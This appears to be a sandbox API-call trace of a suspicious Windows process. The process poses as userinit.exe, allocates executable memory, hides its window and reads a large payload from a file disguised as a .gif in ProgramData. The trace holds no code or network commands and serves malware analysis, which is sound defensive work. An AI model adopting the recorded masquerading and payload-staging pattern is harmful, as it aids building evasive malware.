[0147.887] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0147.887] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0147.887] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0147.887] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0147.887] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0147.887] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0147.887] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0147.887] GetDC (hWnd=0x0) returned 0x6401085e
[0147.887] GetDeviceCaps (hdc=0x6401085e, index=90) returned 96
[0147.887] ReleaseDC (hWnd=0x0, hDC=0x6401085e) returned 1
[0147.887] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0147.887] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x444d6c, dwData=0x131155c) returned 1
[0147.887] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18fbaf, fWinIni=0x0 | out: pvParam=0x18fbaf) returned 1
[0147.887] CreateFontIndirectA (lplf=0x18fbaf) returned 0x320a0889
[0147.887] GetObjectA (in: h=0x320a0889, c=60, pv=0x18f9a0 | out: pv=0x18f9a0) returned 60
[0147.888] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18fa5b, fWinIni=0x0 | out: pvParam=0x18fa5b) returned 1
[0147.888] CreateFontIndirectA (lplf=0x18fb37) returned 0x250a0861
[0147.888] GetObjectA (in: h=0x250a0861, c=60, pv=0x18f9a0 | out: pv=0x18f9a0) returned 60
[0147.888] CreateFontIndirectA (lplf=0x18fafb) returned 0x3c0a0855
[0147.888] GetObjectA (in: h=0x3c0a0855, c=60, pv=0x18f9a0 | out: pv=0x18f9a0) returned 60
[0147.888] LoadIconA (hInstance=0x400000, lpIconName="MAINICON") returned 0x0
[0147.888] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18fb0f, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0147.888] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x18fb0f | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0147.888] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0xd0000
[0147.889] GetClassInfoA (in: hInstance=0x400000, lpClassName="TApplication", lpWndClass=0x18fac4 | out: lpWndClass=0x18fac4) returned 0
[0147.889] RegisterClassA (lpWndClass=0x451c88) returned 0x20c167
[0147.889] GetSystemMetrics (nIndex=0) returned 1440
[0147.889] GetSystemMetrics (nIndex=1) returned 900
[0147.889] CreateWindowExA (dwExStyle=0x0, lpClassName="TApplication", lpWindowName="userinit", dwStyle=0x84ca0000, X=720, Y=450, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x201ac
[0147.895] SetWindowLongA (hWnd=0x201ac, nIndex=-4, dwNewLong=856047) returned 4219500
[0147.895] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0147.895] SendMessageA (hWnd=0x201ac, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0147.895] DefWindowProcA (hWnd=0x201ac, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0
[0147.909] DefWindowProcA (hWnd=0x201ac, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x90201
[0147.910] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0147.910] SetClassLongA (hWnd=0x201ac, nIndex=-14, dwNewLong=65575) returned 0x0
[0147.911] GetSystemMenu (hWnd=0x201ac, bRevert=0) returned 0x901c1
[0147.913] DeleteMenu (hMenu=0x901c1, uPosition=0xf030, uFlags=0x0) returned 1
[0147.913] DeleteMenu (hMenu=0x901c1, uPosition=0xf000, uFlags=0x0) returned 1
[0147.913] DeleteMenu (hMenu=0x901c1, uPosition=0xf010, uFlags=0x0) returned 1
[0147.914] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18fa90 | out: lpList=0x18fa90) returned 1
[0147.915] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0147.915] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0147.915] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0147.915] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0147.916] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0147.916] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0147.917] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0147.917] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0147.917] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0147.917] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0147.917] GetCurrentThreadId () returned 0x524
[0147.917] GlobalAddAtomA (lpString="WndProcPtr0040000000000524") returned 0xc11c
[0147.917] VirtualAlloc (lpAddress=0x1314000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1314000
[0147.917] ShowWindow (hWnd=0x201ac, nCmdShow=0) returned 0
[0147.918] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0147.918] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmg.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmg.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x98
[0147.918] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f810*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f810*=0) returned 0x0
[0147.918] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f808*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x18f808*=0) returned 0x0
[0147.918] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f808*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x18f808*=0) returned 0x10be00
[0147.918] SetFilePointer (in: hFile=0x98, lDistanceToMove=0, lpDistanceToMoveHigh=0x18f808*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x18f808*=0) returned 0x0
[0147.919] GlobalLock (hMem=0x360004) returned 0x2320020
[0147.919] ReadFile (in: hFile=0x98, lpBuffer=0x2320020, nNumberOfBytesToRead=0x10be00, lpNumberOfBytesRead=0x18f824, lpOverlapped=0x0 | out: lpBuffer=0x2320020*, lpNumberOfBytesRead=0x18f824*=0x10be00, lpOverlapped=0x0) returned 1
[0147.967] CloseHandle (hObject=0x98) returned 1
[0147.967] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.968] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.968] GlobalUnlock (hMem=0x36000c) returned 0
[0147.968] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4000, uFlags=0x2) returned 0x36000c
[0147.968] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.969] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.969] GlobalUnlock (hMem=0x36000c) returned 0
[0147.969] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6000, uFlags=0x2) returned 0x36000c
[0147.970] GlobalLock (hMem=0x36000c) returned 0x62a820
[0147.971] GlobalHandle (pMem=0x62a820) returned 0x36000c
[0147.971] GlobalUnlock (hMem=0x36000c) returned 0
[0147.971] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8000, uFlags=0x2) returned 0x36000c
[0147.971] GlobalLock (hMem=0x36000c) returned 0x630830
[0147.972] GlobalHandle (pMem=0x630830) returned 0x36000c
[0147.972] GlobalUnlock (hMem=0x36000c) returned 0
[0147.972] GlobalReAlloc (hMem=0x36000c, dwBytes=0xa000, uFlags=0x2) returned 0x36000c
[0147.972] GlobalLock (hMem=0x36000c) returned 0x630830
[0147.973] GlobalHandle (pMem=0x630830) returned 0x36000c
[0147.973] GlobalUnlock (hMem=0x36000c) returned 0
[0147.973] GlobalReAlloc (hMem=0x36000c, dwBytes=0xc000, uFlags=0x2) returned 0x36000c
[0147.974] GlobalLock (hMem=0x36000c) returned 0x63a840
[0147.975] GlobalHandle (pMem=0x63a840) returned 0x36000c
[0147.975] GlobalUnlock (hMem=0x36000c) returned 0
[0147.975] GlobalReAlloc (hMem=0x36000c, dwBytes=0xe000, uFlags=0x2) returned 0x36000c
[0147.975] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.976] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.976] GlobalUnlock (hMem=0x36000c) returned 0
[0147.976] GlobalReAlloc (hMem=0x36000c, dwBytes=0x10000, uFlags=0x2) returned 0x36000c
[0147.976] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.977] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.977] GlobalUnlock (hMem=0x36000c) returned 0
[0147.977] GlobalReAlloc (hMem=0x36000c, dwBytes=0x12000, uFlags=0x2) returned 0x36000c
[0147.977] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.978] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.978] GlobalUnlock (hMem=0x36000c) returned 0
[0147.978] GlobalReAlloc (hMem=0x36000c, dwBytes=0x14000, uFlags=0x2) returned 0x36000c
[0147.978] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.979] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.979] GlobalUnlock (hMem=0x36000c) returned 0
[0147.979] GlobalReAlloc (hMem=0x36000c, dwBytes=0x16000, uFlags=0x2) returned 0x36000c
[0147.979] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.980] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.980] GlobalUnlock (hMem=0x36000c) returned 0
[0147.980] GlobalReAlloc (hMem=0x36000c, dwBytes=0x18000, uFlags=0x2) returned 0x36000c
[0147.980] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.981] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.981] GlobalUnlock (hMem=0x36000c) returned 0
[0147.981] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1a000, uFlags=0x2) returned 0x36000c
[0147.981] GlobalLock (hMem=0x36000c) returned 0x626810
[0147.982] GlobalHandle (pMem=0x626810) returned 0x36000c
[0147.982] GlobalUnlock (hMem=0x36000c) returned 0
[0147.982] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1c000, uFlags=0x2) returned 0x36000c
[0147.982] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.002] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.002] GlobalUnlock (hMem=0x36000c) returned 0
[0148.002] GlobalReAlloc (hMem=0x36000c, dwBytes=0x1e000, uFlags=0x2) returned 0x36000c
[0148.002] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.003] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.003] GlobalUnlock (hMem=0x36000c) returned 0
[0148.003] GlobalReAlloc (hMem=0x36000c, dwBytes=0x20000, uFlags=0x2) returned 0x36000c
[0148.003] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.004] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.004] GlobalUnlock (hMem=0x36000c) returned 0
[0148.004] GlobalReAlloc (hMem=0x36000c, dwBytes=0x22000, uFlags=0x2) returned 0x36000c
[0148.006] GlobalLock (hMem=0x36000c) returned 0x646820
[0148.007] GlobalHandle (pMem=0x646820) returned 0x36000c
[0148.007] GlobalUnlock (hMem=0x36000c) returned 0
[0148.007] GlobalReAlloc (hMem=0x36000c, dwBytes=0x24000, uFlags=0x2) returned 0x36000c
[0148.007] GlobalLock (hMem=0x36000c) returned 0x646820
[0148.008] GlobalHandle (pMem=0x646820) returned 0x36000c
[0148.008] GlobalUnlock (hMem=0x36000c) returned 0
[0148.008] GlobalReAlloc (hMem=0x36000c, dwBytes=0x26000, uFlags=0x2) returned 0x36000c
[0148.011] GlobalLock (hMem=0x36000c) returned 0x66a830
[0148.011] GlobalHandle (pMem=0x66a830) returned 0x36000c
[0148.012] GlobalUnlock (hMem=0x36000c) returned 0
[0148.012] GlobalReAlloc (hMem=0x36000c, dwBytes=0x28000, uFlags=0x2) returned 0x36000c
[0148.012] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.012] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.012] GlobalUnlock (hMem=0x36000c) returned 0
[0148.012] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2a000, uFlags=0x2) returned 0x36000c
[0148.012] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.013] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.013] GlobalUnlock (hMem=0x36000c) returned 0
[0148.013] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2c000, uFlags=0x2) returned 0x36000c
[0148.013] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.014] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.014] GlobalUnlock (hMem=0x36000c) returned 0
[0148.014] GlobalReAlloc (hMem=0x36000c, dwBytes=0x2e000, uFlags=0x2) returned 0x36000c
[0148.014] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.015] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.015] GlobalUnlock (hMem=0x36000c) returned 0
[0148.015] GlobalReAlloc (hMem=0x36000c, dwBytes=0x30000, uFlags=0x2) returned 0x36000c
[0148.015] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.016] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.016] GlobalUnlock (hMem=0x36000c) returned 0
[0148.016] GlobalReAlloc (hMem=0x36000c, dwBytes=0x32000, uFlags=0x2) returned 0x36000c
[0148.016] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.017] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.017] GlobalUnlock (hMem=0x36000c) returned 0
[0148.017] GlobalReAlloc (hMem=0x36000c, dwBytes=0x34000, uFlags=0x2) returned 0x36000c
[0148.017] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.018] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.018] GlobalUnlock (hMem=0x36000c) returned 0
[0148.018] GlobalReAlloc (hMem=0x36000c, dwBytes=0x36000, uFlags=0x2) returned 0x36000c
[0148.018] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.019] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.019] GlobalUnlock (hMem=0x36000c) returned 0
[0148.019] GlobalReAlloc (hMem=0x36000c, dwBytes=0x38000, uFlags=0x2) returned 0x36000c
[0148.019] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.019] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.019] GlobalUnlock (hMem=0x36000c) returned 0
[0148.019] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3a000, uFlags=0x2) returned 0x36000c
[0148.020] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.020] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.020] GlobalUnlock (hMem=0x36000c) returned 0
[0148.020] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3c000, uFlags=0x2) returned 0x36000c
[0148.020] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.021] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.021] GlobalUnlock (hMem=0x36000c) returned 0
[0148.021] GlobalReAlloc (hMem=0x36000c, dwBytes=0x3e000, uFlags=0x2) returned 0x36000c
[0148.021] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.022] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.022] GlobalUnlock (hMem=0x36000c) returned 0
[0148.022] GlobalReAlloc (hMem=0x36000c, dwBytes=0x40000, uFlags=0x2) returned 0x36000c
[0148.022] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.023] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.023] GlobalUnlock (hMem=0x36000c) returned 0
[0148.023] GlobalReAlloc (hMem=0x36000c, dwBytes=0x42000, uFlags=0x2) returned 0x36000c
[0148.023] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.024] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.024] GlobalUnlock (hMem=0x36000c) returned 0
[0148.024] GlobalReAlloc (hMem=0x36000c, dwBytes=0x44000, uFlags=0x2) returned 0x36000c
[0148.024] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.025] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.025] GlobalUnlock (hMem=0x36000c) returned 0
[0148.025] GlobalReAlloc (hMem=0x36000c, dwBytes=0x46000, uFlags=0x2) returned 0x36000c
[0148.025] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.026] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.026] GlobalUnlock (hMem=0x36000c) returned 0
[0148.026] GlobalReAlloc (hMem=0x36000c, dwBytes=0x48000, uFlags=0x2) returned 0x36000c
[0148.026] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.027] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.027] GlobalUnlock (hMem=0x36000c) returned 0
[0148.027] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4a000, uFlags=0x2) returned 0x36000c
[0148.027] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.028] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.028] GlobalUnlock (hMem=0x36000c) returned 0
[0148.028] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4c000, uFlags=0x2) returned 0x36000c
[0148.028] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.029] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.029] GlobalUnlock (hMem=0x36000c) returned 0
[0148.029] GlobalReAlloc (hMem=0x36000c, dwBytes=0x4e000, uFlags=0x2) returned 0x36000c
[0148.029] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.029] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.029] GlobalUnlock (hMem=0x36000c) returned 0
[0148.029] GlobalReAlloc (hMem=0x36000c, dwBytes=0x50000, uFlags=0x2) returned 0x36000c
[0148.030] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.030] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.030] GlobalUnlock (hMem=0x36000c) returned 0
[0148.030] GlobalReAlloc (hMem=0x36000c, dwBytes=0x52000, uFlags=0x2) returned 0x36000c
[0148.030] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.031] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.031] GlobalUnlock (hMem=0x36000c) returned 0
[0148.031] GlobalReAlloc (hMem=0x36000c, dwBytes=0x54000, uFlags=0x2) returned 0x36000c
[0148.031] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.032] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.032] GlobalUnlock (hMem=0x36000c) returned 0
[0148.032] GlobalReAlloc (hMem=0x36000c, dwBytes=0x56000, uFlags=0x2) returned 0x36000c
[0148.032] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.033] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.033] GlobalUnlock (hMem=0x36000c) returned 0
[0148.033] GlobalReAlloc (hMem=0x36000c, dwBytes=0x58000, uFlags=0x2) returned 0x36000c
[0148.033] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.034] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.034] GlobalUnlock (hMem=0x36000c) returned 0
[0148.034] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5a000, uFlags=0x2) returned 0x36000c
[0148.034] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.035] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.035] GlobalUnlock (hMem=0x36000c) returned 0
[0148.035] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5c000, uFlags=0x2) returned 0x36000c
[0148.035] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.036] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.036] GlobalUnlock (hMem=0x36000c) returned 0
[0148.036] GlobalReAlloc (hMem=0x36000c, dwBytes=0x5e000, uFlags=0x2) returned 0x36000c
[0148.036] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.037] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.037] GlobalUnlock (hMem=0x36000c) returned 0
[0148.037] GlobalReAlloc (hMem=0x36000c, dwBytes=0x60000, uFlags=0x2) returned 0x36000c
[0148.037] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.039] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.039] GlobalUnlock (hMem=0x36000c) returned 0
[0148.039] GlobalReAlloc (hMem=0x36000c, dwBytes=0x62000, uFlags=0x2) returned 0x36000c
[0148.039] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.039] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.039] GlobalUnlock (hMem=0x36000c) returned 0
[0148.040] GlobalReAlloc (hMem=0x36000c, dwBytes=0x64000, uFlags=0x2) returned 0x36000c
[0148.040] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.040] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.040] GlobalUnlock (hMem=0x36000c) returned 0
[0148.040] GlobalReAlloc (hMem=0x36000c, dwBytes=0x66000, uFlags=0x2) returned 0x36000c
[0148.040] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.041] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.041] GlobalUnlock (hMem=0x36000c) returned 0
[0148.041] GlobalReAlloc (hMem=0x36000c, dwBytes=0x68000, uFlags=0x2) returned 0x36000c
[0148.041] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.042] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.042] GlobalUnlock (hMem=0x36000c) returned 0
[0148.042] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6a000, uFlags=0x2) returned 0x36000c
[0148.042] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.043] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.043] GlobalUnlock (hMem=0x36000c) returned 0
[0148.043] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6c000, uFlags=0x2) returned 0x36000c
[0148.050] GlobalLock (hMem=0x36000c) returned 0x690820
[0148.050] GlobalHandle (pMem=0x690820) returned 0x36000c
[0148.051] GlobalUnlock (hMem=0x36000c) returned 0
[0148.051] GlobalReAlloc (hMem=0x36000c, dwBytes=0x6e000, uFlags=0x2) returned 0x36000c
[0148.051] GlobalLock (hMem=0x36000c) returned 0x690820
[0148.051] GlobalHandle (pMem=0x690820) returned 0x36000c
[0148.051] GlobalUnlock (hMem=0x36000c) returned 0
[0148.051] GlobalReAlloc (hMem=0x36000c, dwBytes=0x70000, uFlags=0x2) returned 0x36000c
[0148.067] GlobalLock (hMem=0x36000c) returned 0x2430048
[0148.068] GlobalHandle (pMem=0x2430048) returned 0x36000c
[0148.068] GlobalUnlock (hMem=0x36000c) returned 0
[0148.068] GlobalReAlloc (hMem=0x36000c, dwBytes=0x72000, uFlags=0x2) returned 0x36000c
[0148.075] GlobalLock (hMem=0x36000c) returned 0x24a0058
[0148.076] GlobalHandle (pMem=0x24a0058) returned 0x36000c
[0148.076] GlobalUnlock (hMem=0x36000c) returned 0
[0148.076] GlobalReAlloc (hMem=0x36000c, dwBytes=0x74000, uFlags=0x2) returned 0x36000c
[0148.076] GlobalLock (hMem=0x36000c) returned 0x24a0058
[0148.077] GlobalHandle (pMem=0x24a0058) returned 0x36000c
[0148.077] GlobalUnlock (hMem=0x36000c) returned 0
[0148.077] GlobalReAlloc (hMem=0x36000c, dwBytes=0x76000, uFlags=0x2) returned 0x36000c
[0148.094] GlobalLock (hMem=0x36000c) returned 0x626810
[0148.095] GlobalHandle (pMem=0x626810) returned 0x36000c
[0148.095] GlobalUnlock (hMem=0x36000c) returned 0
[0148.095] GlobalReAlloc (hMem=0x36000c, dwBytes=0x78000, uFlags=0x2) returned 0x36000c
[0148.102] GlobalLock (hMem=0x36000c) returned 0x2430048
[0148.103] GlobalHandle (pMem=0x2430048) returned 0x36000c
[0148.103] GlobalUnlock (hMem=0x36000c) returned 0
[0148.103] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7a000, uFlags=0x2) returned 0x36000c
[0148.110] GlobalLock (hMem=0x36000c) returned 0x24a8058
[0148.111] GlobalHandle (pMem=0x24a8058) returned 0x36000c
[0148.111] GlobalUnlock (hMem=0x36000c) returned 0
[0148.111] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7c000, uFlags=0x2) returned 0x36000c
[0148.111] GlobalLock (hMem=0x36000c) returned 0x24a8058
[0148.112] GlobalHandle (pMem=0x24a8058) returned 0x36000c
[0148.112] GlobalUnlock (hMem=0x36000c) returned 0
[0148.112] GlobalReAlloc (hMem=0x36000c, dwBytes=0x7e000, uFlags=0x2) returned 0x36000c
[0148.130] GlobalLock (hMem=0x36000c) returned 0x2530048
[0148.131] GlobalHandle (pMem=0x2530048) returned 0x36000c
[0148.131] GlobalUnlock (hMem=0x36000c) returned 0
[0148.131] GlobalReAlloc (hMem=0x36000c, dwBytes=0x80000, uFlags=0x2) returned 0x36000c
[0148.151] GlobalLock (hMem=0x36000c) returned 0x580020
[0148.152] GlobalHandle (pMem=0x580020) returned 0x36000c
[0148.152] GlobalUnlock (hMem=0x36000c) returned 0
[0148.153] GlobalReAlloc (hMem=0x36000c, dwBytes=0x82000, uFlags=0x2) returned 0x36000c
[0148.166] GlobalLock (hMem=0x36000c) returned 0x1410020
[0148.167] GlobalHandle (pMem=0x1410020) returned 0x36000c
[0148.167] GlobalUnlock (hMem=0x36000c) returned 0
[0148.167] GlobalReAlloc (hMem=0x36000c, dwBytes=0x84000, uFlags=0x2) returned 0x36000c
[0148.180] GlobalLock (hMem=0x36000c) returned 0x580020
[0148.181] GlobalHandle (pMem=0x580020) returned 0x36000c
[0148.182] GlobalUnlock (hMem=0x36000c) returned 0
[0148.182] GlobalReAlloc (hMem=0x36000c, dwBytes=0x86000, uFlags=0x2) returned 0x36000c
[0148.195] GlobalLock (hMem=0x36000c) returned 0x1410020
[0148.196] GlobalHandle (pMem=0x1410020) returned 0x36000c
[0148.196] GlobalUnlock (hMem=0x36000c) returned 0
[0148.196] GlobalReAlloc (hMem=0x36000c, dwBytes=0x88000, uFlags=0x2) returned 0x36000c
[0148.210] GlobalLock (hMem=0x36000c) returned 0x580020
[0148.211] GlobalHandle (pMem=0x580020) returned 0x36000c
[0148.211] GlobalUnlock (hMem=0x36000c) returned 0
[0148.211] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8a000, uFlags=0x2) returned 0x36000c
[0148.224] GlobalLock (hMem=0x36000c) returned 0x1410020
[0148.225] GlobalHandle (pMem=0x1410020) returned 0x36000c
[0148.225] GlobalUnlock (hMem=0x36000c) returned 0
[0148.226] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8c000, uFlags=0x2) returned 0x36000c
[0148.239] GlobalLock (hMem=0x36000c) returned 0x580020
[0148.241] GlobalHandle (pMem=0x580020) returned 0x36000c
[0148.241] GlobalUnlock (hMem=0x36000c) returned 0
[0148.241] GlobalReAlloc (hMem=0x36000c, dwBytes=0x8e000, uFlags=0x2) returned 0x36000c
[0148.255] GlobalLock (hMem=0x36000c) returned 0x1410020
[0148.256] GlobalHandle (pMem=0x1410020) returned 0x36000c
[0148.256] GlobalUnlock (hMem=0x36000c) returned 0
[0148.256] GlobalReAlloc (hMem=0x36000c, dwBytes=0x90000, uFlags=0x2) returned 0x36000c
[0148.270] GlobalLock (hMem=0x36000c) returned 0x14e0020
[0148.272] GlobalHandle (pMem=0x14e0020) returned 0x36000c
[0148.272] GlobalUnlock (hMem=0x36000c) returned 0
[0148.272] GlobalReAlloc (hMem=0x36000c, dwBytes=0x92000, uFlags=0x2) returned 0x36000c
[0148.286] GlobalLock (hMem=0x36000c) returned 0x2730020
